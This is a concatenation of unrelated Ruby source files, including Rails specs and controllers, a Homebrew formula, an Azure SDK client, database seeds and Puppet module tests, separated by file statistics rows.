        patch event_step_path(readable_event_id, :personal_details), params: params, headers: { "REMOTE_ADDR" => ip }
      end
    end

    it_behaves_like "an IP-based rate limited endpoint", "PATCH */events/:id/apply/personalised_updates", 5, 1.minute do
      def perform_request
        key = Events::Steps::PersonalisedUpdates.model_name.param_key
        params = { key => attributes_for(:events_personalised_updates) }
        patch event_step_path(readable_event_id, :personalised_updates), params: params, headers: { "REMOTE_ADDR" => ip }
      end
    end

    it_behaves_like "an IP-based rate limited endpoint", "PATCH */events/:id/apply/further_details", 5, 1.minute do
      def perform_request
        key = Events::Steps::FurtherDetails.model_name.param_key
        params = { key => attributes_for(:events_further_details) }
        patch event_step_path(readable_event_id, :further_details), params: params, headers: { "REMOTE_ADDR" => ip }
      end
    end
  end
end
| 41.111111 | 121 | 0.710473 |
$LOAD_PATH << 'lib'
require 'benchmark'
require 'bloomfilter-rb'

# Benchmark insert and membership lookups on a Redis-backed bloom filter.
n = 10000

Benchmark.bm do |bench|
  filter = BloomFilter::Redis.new

  bench.report("insert") do
    n.times { filter.insert("a") }
  end

  bench.report("lookup present") do
    n.times { filter.include?("a") }
  end

  bench.report("lookup missing") do
    n.times { filter.include?("b") }
  end
end

# user     system      total        real
# insert  1.000000   0.380000   1.380000 (  1.942181)
# lookup present  1.030000   0.470000   1.500000 (  2.577577)
# lookup missing  0.370000   0.160000   0.530000 (  1.060429)
e82c93843c78ea5c8deb8a5fa829654d17055896 | 367 | class InvoicesMailer < ActionMailer::Base
default from: Rails.configuration.sender
def send_invoice(invoice_id, to, subject, message, attach_pdf)
@invoice = Invoice.find(invoice_id)
@message = message
attachments["invoice-#{@invoice.code}.pdf"] = File.read(@invoice.invoice_location) if attach_pdf
mail(to: to, subject: subject)
end
end
| 30.583333 | 100 | 0.724796 |
2825dbffe21f370911fd56e0515ba89a2f5ac1a4 | 2,596 | class Hdf4 < Formula
homepage "http://www.hdfgroup.org"
url "http://www.hdfgroup.org/ftp/HDF/releases/HDF4.2.10/src/hdf-4.2.10.tar.bz2"
sha1 "5163543895728dabb536a0659b3d965d55bccf74"
bottle do
root_url "https://homebrew.bintray.com/bottles-versions"
sha1 "c2c52d5a07559d08d3eb5af108ed8b839721ed88" => :yosemite
sha1 "ac39325b98c7baac776f8a28e4fb138a25ea7340" => :mavericks
sha1 "cc499e59d40db001001ef595539e1d79dcf18c96" => :mountain_lion
end
option "with-fortran", "Build Fortran interface."
deprecated_option "enable-fortran" => "with-fortran"
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "szip"
depends_on "jpeg"
depends_on :fortran => :optional
# redefine library name to "df" from "hdf". this seems to be an artifact
# of using cmake that needs to be corrected for compatibility with
# anything depending on hdf4.
patch :DATA
def install
ENV["SZIP_INSTALL"] = HOMEBREW_PREFIX
args = std_cmake_args
args.concat [
"-DBUILD_SHARED_LIBS=ON",
"-DBUILD_TESTING=OFF",
"-DHDF4_BUILD_TOOLS=ON",
"-DHDF4_BUILD_UTILS=ON",
"-DHDF4_BUILD_WITH_INSTALL_NAME=ON",
"-DHDF4_ENABLE_JPEG_LIB_SUPPORT=ON",
"-DHDF4_ENABLE_NETCDF=OFF", # Conflict. Just install NetCDF for this.
"-DHDF4_ENABLE_SZIP_ENCODING=ON",
"-DHDF4_ENABLE_SZIP_SUPPORT=ON",
"-DHDF4_ENABLE_Z_LIB_SUPPORT=ON"
]
if build.with? "fortran"
args.concat %W[-DHDF4_BUILD_FORTRAN=ON -DCMAKE_Fortran_MODULE_DIRECTORY=#{include}]
else
args << "-DHDF4_BUILD_FORTRAN=OFF"
end
mkdir "build" do
system "cmake", "..", *args
system "make", "install"
# Remove stray ncdump executable as it conflicts with NetCDF.
rm (bin+"ncdump")
end
end
# Post-install message explaining why this legacy formula still exists.
# Fixes the user-facing spelling error "superseeded" -> "superseded".
def caveats; <<-EOS.undent
HDF4 has been superseded by HDF5. However, the API changed
substantially and some programs still require the HDF4 libraries in order
to function.
EOS
end
end
__END__
diff --git a/CMakeLists.txt b/CMakeLists.txt
index ba2cf13..27a3df4 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -95,7 +95,7 @@ MARK_AS_ADVANCED (HDF4_NO_PACKAGES)
# Set the core names of all the libraries
#-----------------------------------------------------------------------------
SET (HDF4_LIB_CORENAME "hdf4")
-SET (HDF4_SRC_LIB_CORENAME "hdf")
+SET (HDF4_SRC_LIB_CORENAME "df")
SET (HDF4_SRC_FCSTUB_LIB_CORENAME "hdf_fcstub")
SET (HDF4_SRC_FORTRAN_LIB_CORENAME "hdf_fortran")
SET (HDF4_MF_LIB_CORENAME "mfhdf")
| 31.658537 | 89 | 0.67604 |
7948995ba6170f212af650499b890b9a2f420589 | 4,086 | # This file was generated by the `rails generate rspec:install` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
require 'database_cleaner/active_record'
DatabaseCleaner.strategy = :truncation
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
config.before(:suite) do
DatabaseCleaner.clean
end
config.expect_with :rspec do |expectations|
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
config.mock_with :rspec do |mocks|
mocks.verify_partial_doubles = true
end
config.default_formatter = "doc"
# This option will default to `:apply_to_host_groups` in RSpec 4 (and will
# have no way to turn it off -- the option exists only for backwards
# compatibility in RSpec 3). It causes shared context metadata to be
# inherited by the metadata hash of host groups and examples, rather than
# triggering implicit auto-inclusion in groups with matching metadata.
config.shared_context_metadata_behavior = :apply_to_host_groups
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# This allows you to limit a spec run to individual examples or groups
# you care about by tagging them with `:focus` metadata. When nothing
# is tagged with `:focus`, all examples get run. RSpec also provides
# aliases for `it`, `describe`, and `context` that include `:focus`
# metadata: `fit`, `fdescribe` and `fcontext`, respectively.
config.filter_run_when_matching :focus
# Allows RSpec to persist some state between runs in order to support
# the `--only-failures` and `--next-failure` CLI options. We recommend
# you configure your source control system to ignore this file.
config.example_status_persistence_file_path = "spec/examples.txt"
# Limits the available syntax to the non-monkey patched syntax that is
# recommended. For more details, see:
# - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
# - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
config.disable_monkey_patching!
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = "doc"
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
| 44.413043 | 92 | 0.755262 |
5daeb2f445d8cc2e3e57c6691123e517973bad55 | 3,020 | # frozen_string_literal: true
module TwelvedataRuby
# Base error for the TwelvedataRuby gem. Subclasses are looked up in
# DEFAULT_MSGS by their demodulized class name, and the stored template is
# interpolated with the supplied attrs via Kernel#format-style %{} refs.
class Error < StandardError
DEFAULT_MSGS = {
"EndpointError" => "Endpoint is not valid. %{invalid}",
"EndpointNameError" => "`%{invalid}` is not a correct endpoint. Valid values are: `%{valid_names}`",
"EndpointParametersKeysError" => "Invalid parameters found: `%{invalid}`. Valid parameters for `%{name}` "\
"endpoint are: `%{parameters}`. Please see: `Twelvedata::Endpoint#parameters` for more details",
"EndpointRequiredParametersError" => "Missing values for required parameters: `%{invalid}`. "\
"`%{name}` endpoint required parameters are: `%{required}`.",
"ResponseError" => "Encountered an error from the response"
}.freeze
# attrs - Hash of values interpolated into the message template.
attr_reader :attrs
# args[:attrs]   - interpolation values for the message template
# args[:message] - explicit message overriding the DEFAULT_MSGS lookup
#
# NOTE(review): if a subclass has no DEFAULT_MSGS entry and no :message is
# given, `nil % @attrs` raises NoMethodError — presumably every concrete
# subclass is covered by the map; verify when adding new error classes.
def initialize(args={})
@attrs = args[:attrs] || {}
super((args[:message] || DEFAULT_MSGS[Utils.demodulize(self.class)]) % @attrs)
end
end
# Raised for invalid endpoint usage. Collects human-readable details from
# the offending Endpoint object into the attrs hash consumed by Error's
# message templates (%{name}, %{invalid}, %{valid_names}, ...).
class EndpointError < Error
# args[:endpoint] - the Endpoint instance being validated
# args[:invalid]  - the invalid name/keys that triggered the error
def initialize(**args)
endpoint = args[:endpoint]
super(
attrs: {
name: endpoint.name,
invalid: args[:invalid],
# Safe navigation + send: these may legitimately be nil for some
# endpoint states, in which case the template slot stays blank.
valid_names: endpoint.class.names.join(", "),
parameters: endpoint&.parameters_keys&.send(:join, ", "),
required: endpoint&.required_parameters&.send(:join, ", ")
}
)
end
end
class EndpointNameError < EndpointError; end
class EndpointParametersKeysError < EndpointError; end
class EndpointRequiredParametersError < EndpointError; end
# Raised when the Twelvedata API (or plain HTTP layer) returns an error
# response. Status codes are mapped to concrete subclass names below.
class ResponseError < Error
# API-level error codes (returned in the JSON payload).
API_ERROR_CODES_MAP = {
400 => "BadRequestResponseError",
401 => "UnauthorizedResponseError",
403 => "ForbiddenResponseError",
404 => "NotFoundResponseError",
414 => "ParameterTooLongResponseError",
429 => "TooManyRequestsResponseError",
500 => "InternalServerResponseError"
}.freeze
# Transport-level HTTP error codes.
HTTP_ERROR_CODES_MAP = {
404 => "PageNotFoundResponseError",
}.freeze
# Returns the subclass name (String) registered for the given code, or
# nil when the code is unmapped. error_type falls back to :api for any
# value other than :api/:http.
def self.error_code_klass(code, error_type=:api)
error_type = :api unless %i[api http].member?(error_type)
TwelvedataRuby::ResponseError.const_get("#{error_type.upcase}_ERROR_CODES_MAP")[code]
end
# json    - parsed response body (non-Hash values are discarded)
# code    - explicit status code, defaults to the body's :code field
# request - the originating request object, kept for debugging
attr_reader :json, :code, :request
def initialize(json:, request:, attrs: nil, message: nil, code: nil)
@json = json.is_a?(Hash) ? json : {}
@code = code || @json[:code]
@attrs = attrs || {}
@request = request
# Body-provided message wins over the caller-supplied one.
super(attrs: @attrs, message: "#{@json[:message] || message}")
end
end
class BadRequestResponseError < ResponseError; end
class UnauthorizedResponseError < ResponseError; end
class ForbiddenResponseError < ResponseError; end
class NotFoundResponseError < ResponseError; end
class PageNotFoundResponseError < ResponseError; end
class ParameterTooLongResponseError < ResponseError; end
class TooManyRequestsResponseError < ResponseError; end
class InternalServerResponseErro < ResponseError; end
end
| 33.186813 | 135 | 0.657285 |
33e6c4dbf2c96b1650e572146b887c13b7279124 | 153 | # frozen_string_literal: true
# Smoke test: the gem defines a VERSION constant.
RSpec.describe EtdaUtilities do
it "has a version number" do
expect(EtdaUtilities::VERSION).not_to be nil
end
end
| 19.125 | 48 | 0.764706 |
bbba61557acdfbc4d398c50b4d5f00a3386bf724 | 320 | # frozen_string_literal: true
# Entry point for the dfe_wizard gem: loads ActiveSupport/ActiveModel
# dependencies, then the gem's own components, and declares the
# top-level namespace.
require "active_support"
require "active_support/core_ext"
require "active_model"
require "dfe_wizard/version"
require "dfe_wizard/store"
require "dfe_wizard/step"
require "dfe_wizard/base"
require "dfe_wizard/controller"
require "dfe_wizard/issue_verification_code"
# Namespace module; behavior lives in the files required above.
module DFEWizard
end
| 21.333333 | 44 | 0.834375 |
4af2a2ac4896fa84d364be9bde93d12e8b170830 | 6,366 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::NetApp::Mgmt::V2019_10_01
#
# Microsoft NetApp Azure Resource Provider specification
#
class MountTargets
include MsRestAzure
#
# Creates and initializes a new instance of the MountTargets class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [AzureNetAppFilesManagementClient] reference to the AzureNetAppFilesManagementClient
attr_reader :client
#
# Describe all mount targets
#
# List all mount targets associated with the volume
#
# @param resource_group_name [String] The name of the resource group.
# @param account_name [String] The name of the NetApp account
# @param pool_name [String] The name of the capacity pool
# @param volume_name [String] The name of the volume
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MountTargetList] operation results.
#
def list(resource_group_name, account_name, pool_name, volume_name, custom_headers:nil)
response = list_async(resource_group_name, account_name, pool_name, volume_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Describe all mount targets
#
# List all mount targets associated with the volume
#
# @param resource_group_name [String] The name of the resource group.
# @param account_name [String] The name of the NetApp account
# @param pool_name [String] The name of the capacity pool
# @param volume_name [String] The name of the volume
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(resource_group_name, account_name, pool_name, volume_name, custom_headers:nil)
list_async(resource_group_name, account_name, pool_name, volume_name, custom_headers:custom_headers).value!
end
#
# Describe all mount targets
#
# List all mount targets associated with the volume
#
# @param resource_group_name [String] The name of the resource group.
# @param account_name [String] The name of the NetApp account
# @param pool_name [String] The name of the capacity pool
# @param volume_name [String] The name of the volume
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(resource_group_name, account_name, pool_name, volume_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, 'pool_name is nil' if pool_name.nil?
fail ArgumentError, 'volume_name is nil' if volume_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NetApp/netAppAccounts/{accountName}/capacityPools/{poolName}/volumes/{volumeName}/mountTargets'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'poolName' => pool_name,'volumeName' => volume_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::NetApp::Mgmt::V2019_10_01::Models::MountTargetList.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
end
end
| 46.808824 | 206 | 0.707823 |
ac8953c3251ebf5039dae07505a7504bb9a70e9c | 1,534 | # -*- encoding: utf-8 -*-
# stub: crass 1.0.6 ruby lib
Gem::Specification.new do |s|
s.name = "crass".freeze
s.version = "1.0.6"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "bug_tracker_uri" => "https://github.com/rgrove/crass/issues", "changelog_uri" => "https://github.com/rgrove/crass/blob/v1.0.6/HISTORY.md", "documentation_uri" => "https://www.rubydoc.info/gems/crass/1.0.6", "source_code_uri" => "https://github.com/rgrove/crass/tree/v1.0.6" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["Ryan Grove".freeze]
s.date = "2020-01-12"
s.description = "Crass is a pure Ruby CSS parser based on the CSS Syntax Level 3 spec.".freeze
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/rgrove/crass/".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 1.9.2".freeze)
s.rubygems_version = "3.2.3".freeze
s.summary = "CSS parser based on the CSS Syntax Level 3 spec.".freeze
s.installed_by_version = "3.2.3" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_development_dependency(%q<minitest>.freeze, ["~> 5.0.8"])
s.add_development_dependency(%q<rake>.freeze, ["~> 10.1.0"])
else
s.add_dependency(%q<minitest>.freeze, ["~> 5.0.8"])
s.add_dependency(%q<rake>.freeze, ["~> 10.1.0"])
end
end
| 43.828571 | 321 | 0.687093 |
873731cae5e98db78e039cbe186ddfa226e670f0 | 3,133 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
require 'factory_girl_rails'
require 'faker'
# countries with cities
FactoryGirl.create_list(:country_with_cities, 5)
# users
FactoryGirl.create_list(:user, 20, max_city_id: 25)
# users with additional emails (one batch per domain)
FactoryGirl.create_list(:user_with_emails, 15, max_city_id: 25, domen: "test.ru")
FactoryGirl.create_list(:user_with_emails, 15, max_city_id: 25, domen: "mail.ru")
FactoryGirl.create_list(:user_with_emails, 15, max_city_id: 25, domen: "samsung.com")
# categories
FactoryGirl.create_list(:category, 7)
# tags and technologies
FactoryGirl.create_list(:tag, 30)
FactoryGirl.create_list(:technology, 30)
# projects (in each lifecycle state: default, dev_finished, finished)
FactoryGirl.create_list(:project_with_additions, 20, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30)
FactoryGirl.create_list(:project_with_additions, 20, :dev_finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30)
FactoryGirl.create_list(:project_with_additions, 20, :finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30)
# projects with confirmations
FactoryGirl.create_list(:project_with_confirms, 20, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65)
FactoryGirl.create_list(:project_with_confirms, 20, :dev_finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65)
FactoryGirl.create_list(:project_with_confirms, 20, :finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65)
# projects with participants (executors)
FactoryGirl.create_list(:project_with_confirms, 30, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65,
max_excuters_count: 10, max_excuter_id: 65)
FactoryGirl.create_list(:project_with_confirms, 30, :dev_finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65,
max_excuters_count: 10, max_excuter_id: 65)
FactoryGirl.create_list(:project_with_confirms, 30, :finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65,
max_excuters_count: 10, max_excuter_id: 65)
# organizations — each admin is drawn from the id range of users seeded
# with the matching email domain above
testAdmin = User.find(rand(21..35));
FactoryGirl.create(:organization, creater_id: testAdmin.id, admin_email: testAdmin.email, domen_name: "test.ru")
mailAdmin = User.find(rand(36..50));
FactoryGirl.create(:organization, creater_id: mailAdmin.id, admin_email: mailAdmin.email, domen_name: "mail.ru")
samsungAdmin = User.find(rand(51..65));
FactoryGirl.create(:organization, creater_id: samsungAdmin.id, admin_email: samsungAdmin.email, domen_name: "samsung.com")
| 55.946429 | 184 | 0.789658 |
4ac1ea8c0565cfdbe5e7defcb3a1021d88881f7a | 1,501 | class UserTeeTimesController < ApplicationController
# Adds a user to an existing tee time. Renders the new join record as
# JSON on success; on failure flashes the validation error and redirects
# back to the tee time page.
def create
@user_tee_time = UserTeeTime.new
authorize @user_tee_time
@tee_time = TeeTime.find_by_id(params[:user_tee_time][:tee_time_id])
@user = User.find_by_id(params[:user_tee_time][:user_id])
if @tee_time.add_user(@user)
render json: @tee_time.user_tee_times.last
else
flash[:warning] = @tee_time.user_tee_times.last.errors.full_messages.first
redirect_to tee_time_path(@tee_time)
end
end
# Adjusts the guest count on a join record: operation '1' adds a guest,
# anything else removes one; only '1'/'-1' operations are persisted.
#
# NOTE(review): remove_guest is invoked for ANY operation other than '1'
# (including invalid values) before the operation is validated — the
# in-memory change is simply never saved in that case. Confirm this is
# intentional.
def update
@user_tee_time = UserTeeTime.find_by_id(params[:id])
authorize @user_tee_time
params[:operation] == '1' ? @user_tee_time.add_guest : @user_tee_time.remove_guest
if (params[:operation] == '1' || params[:operation] == '-1') && @user_tee_time.save
# Reload from the DB so the response reflects persisted state.
render json: UserTeeTime.find_by_id(params[:id])
else
flash[:confirmation] = "Uh oh, something went wrong"
redirect_to tee_time_path(@user_tee_time.tee_time)
end
end
# Removes a user from a tee time. If that leaves the tee time empty, the
# tee time and its comments are deleted too and the user is redirected
# to their profile; otherwise the remaining tee time is rendered as JSON.
def destroy
@user_tee_time = UserTeeTime.find_by_id(params[:id])
authorize @user_tee_time
tee_time = @user_tee_time.tee_time
@user_tee_time.destroy
if tee_time.users.empty?
flash[:confirmation] = "Successfully left and deleted Tee Time"
tee_time.comments.destroy_all
tee_time.destroy
redirect_to user_path(current_user)
else
render json: tee_time
end
end
private
# Strong parameters: whitelist the join-record attributes.
def user_tee_time_params
params.require(:user_tee_time).permit(:tee_time_id, :user_id)
end
end
| 29.431373 | 87 | 0.711526 |
1ccf3fc58503851d6b6af400589496c3219ea483 | 13,653 | require 'spec_helper'
describe 'automysqlbackup::backup' do
let :default_params do
{
:cron_script => false,
:backup_dir => '/backup',
:etc_dir => '/usr/local/etc'
}
end
context 'on supported operating systems' do
['Debian', 'RedHat'].each do |osfamily|
describe "with all params on defaults #{osfamily}" do
let(:title) { 'db1' }
let(:params) {{ }}
let(:facts) {{ :osfamily => osfamily }}
let(:pre_condition) { 'include automysqlbackup' }
it 'should contain the automysqlbackup db config file' do
should contain_file('/etc/automysqlbackup/db1.conf').with({
'ensure' => 'file',
'owner' => 'root',
'group' => 'root',
'mode' => '0650',
})
end
it 'should create the cron job' do
should contain_file('/etc/cron.daily/db1-automysqlbackup').with({
'ensure' => 'file',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
})
end
it 'should create the backup destination' do
should contain_file('/var/backup/db1').with({
'ensure' => 'directory',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
})
end
end
describe "with dir params changed and cron disabled" do
let(:title) { 'db1' }
let :params do default_params end
let(:facts) {{ :osfamily => osfamily }}
let(:pre_condition) { 'include automysqlbackup' }
it 'should contain the automysqlbackup db config file' do
should contain_file('/usr/local/etc/db1.conf').with({
'ensure' => 'file',
'owner' => 'root',
'group' => 'root',
'mode' => '0650',
})
end
it 'should create the backup destination' do
should contain_file('/backup/db1').with({
'ensure' => 'directory',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
})
end
it 'should not create cron job' do
should_not contain_file('/etc/cron.daily/db1-automysqlbackup')
end
end
describe "with amb class using non-default etc dir" do
let(:title) { 'db1' }
let(:params) {{ }}
let(:facts) {{ :osfamily => osfamily }}
let(:pre_condition) { 'class { "automysqlbackup": etc_dir => "/usr/local/etc/amb", } ' }
it 'should create the config file' do
should contain_file('/usr/local/etc/amb/db1.conf').with({
'ensure' => 'file',
'owner' => 'root',
'group' => 'root',
'mode' => '0650',
})
end
end
describe "with amb class using non-default backup dir" do
let(:title) { 'db1' }
let(:params) {{ }}
let(:facts) {{ :osfamily => osfamily }}
let(:pre_condition) { 'class { "automysqlbackup": backup_dir => "/amb-backups", } ' }
it 'should create the config file' do
should contain_file('/amb-backups/db1').with({
'ensure' => 'directory',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
})
end
end
describe "with string for array param" do
let(:title) { 'db1' }
let(:params) {{ :db_exclude => "stringval" }}
let(:facts) {{ :osfamily => osfamily }}
let(:pre_condition) { 'include automysqlbackup' }
it 'should throw an error' do
expect { should }.to raise_error(Puppet::Error, /is not an Array/)
end
end
end
end
describe 'config template items' do
let(:facts) {{
:osfamily => 'Debian',
:operatingsystemrelease => '6',
}}
let(:title) { 'db1' }
describe 'inheriting basic params' do
let :params do default_params end
end
# All match and notmatch should be a list of regexs and exact match strings
context ".conf content" do
[
{
:title => 'should contain backup_dir',
:attr => 'backup_dir',
:value => '/var/backup',
:match => [/CONFIG_backup_dir='\/var\/backup\/db1'/],
},
{
:title => 'should contain mysql_dump_username',
:attr => 'mysql_dump_username',
:value => 'mysqlroot',
:match => [/CONFIG_mysql_dump_username='mysqlroot'/],
},
{
:title => 'should contain mysql_dump_password',
:attr => 'mysql_dump_password',
:value => 'mysqlpass',
:match => [/CONFIG_mysql_dump_password='mysqlpass'/],
},
{
:title => 'should contain mysql_dump_host',
:attr => 'mysql_dump_host',
:value => '192.168.1.1',
:match => [/CONFIG_mysql_dump_host='192.168.1.1'/],
},
{
:title => 'should contain mysql_dump_port',
:attr => 'mysql_dump_port',
:value => '33306',
:match => [/CONFIG_mysql_dump_port='33306'/],
},
{
:title => 'should contain multicore',
:attr => 'multicore',
:value => 'yes',
:match => [/CONFIG_multicore='yes'/],
},
{
:title => 'should contain multicore_threads',
:attr => 'multicore_threads',
:value => '3',
:match => [/CONFIG_multicore_threads='3'/],
},
{
:title => 'should contain db_names',
:attr => 'db_names',
:value => ['test','prod_db'],
:match => [/CONFIG_db_names=\( 'test' 'prod_db' \)/],
},
{
:title => 'should contain db_month_names',
:attr => 'db_month_names',
:value => ['prod_db','prod_db2'],
:match => [/CONFIG_db_month_names=\( 'prod_db' 'prod_db2' \)/],
},
{
:title => 'should contain db_exclude',
:attr => 'db_exclude',
:value => ['dev_db','stage_db'],
:match => [/CONFIG_db_exclude=\( 'dev_db' 'stage_db' \)/],
},
{
:title => 'should contain table_exclude',
:attr => 'table_exclude',
:value => ['sessions','temp'],
:match => [/CONFIG_table_exclude=\( 'sessions' 'temp' \)/],
},
{
:title => 'should contain do_monthly',
:attr => 'do_monthly',
:value => '05',
:match => [/CONFIG_do_monthly='05'/],
},
{
:title => 'should contain do_weekly',
:attr => 'do_weekly',
:value => '2',
:match => [/CONFIG_do_weekly='2'/],
},
{
:title => 'should contain rotation_daily',
:attr => 'rotation_daily',
:value => '4',
:match => [/CONFIG_rotation_daily='4'/],
},
{
:title => 'should contain rotation_weekly',
:attr => 'rotation_weekly',
:value => '45',
:match => [/CONFIG_rotation_weekly='45'/],
},
{
:title => 'should contain rotation_monthly',
:attr => 'rotation_monthly',
:value => '230',
:match => [/CONFIG_rotation_monthly='230'/],
},
{
:title => 'should contain mysql_dump_commcomp',
:attr => 'mysql_dump_commcomp',
:value => 'value',
:match => [/CONFIG_mysql_dump_commcomp='value'/],
},
{
:title => 'should contain mysql_dump_usessl',
:attr => 'mysql_dump_usessl',
:value => 'yes',
:match => [/CONFIG_mysql_dump_usessl='yes'/],
},
{
:title => 'should contain mysql_dump_socket',
:attr => 'mysql_dump_socket',
:value => 'none.sock',
:match => [/CONFIG_mysql_dump_socket='none.sock'/],
},
{
:title => 'should contain mysql_dump_max_allowed_packet',
:attr => 'mysql_dump_max_allowed_packet',
:value => '400',
:match => [/CONFIG_mysql_dump_max_allowed_packet='400'/],
},
{
:title => 'should contain mysql_dump_buffer_size',
:attr => 'mysql_dump_buffer_size',
:value => '300',
:match => [/CONFIG_mysql_dump_buffer_size='300'/],
},
{
:title => 'should contain mysql_dump_single_transaction',
:attr => 'mysql_dump_single_transaction',
:value => 'yes',
:match => [/CONFIG_mysql_dump_single_transaction='yes'/],
},
{
:title => 'should contain mysql_dump_master_data',
:attr => 'mysql_dump_master_data',
:value => '1',
:match => [/CONFIG_mysql_dump_master_data='1'/],
},
{
:title => 'should contain mysql_dump_full_schema',
:attr => 'mysql_dump_full_schema',
:value => 'yes',
:match => [/CONFIG_mysql_dump_full_schema='yes'/],
},
{
:title => 'should contain mysql_dump_dbstatus',
:attr => 'mysql_dump_dbstatus',
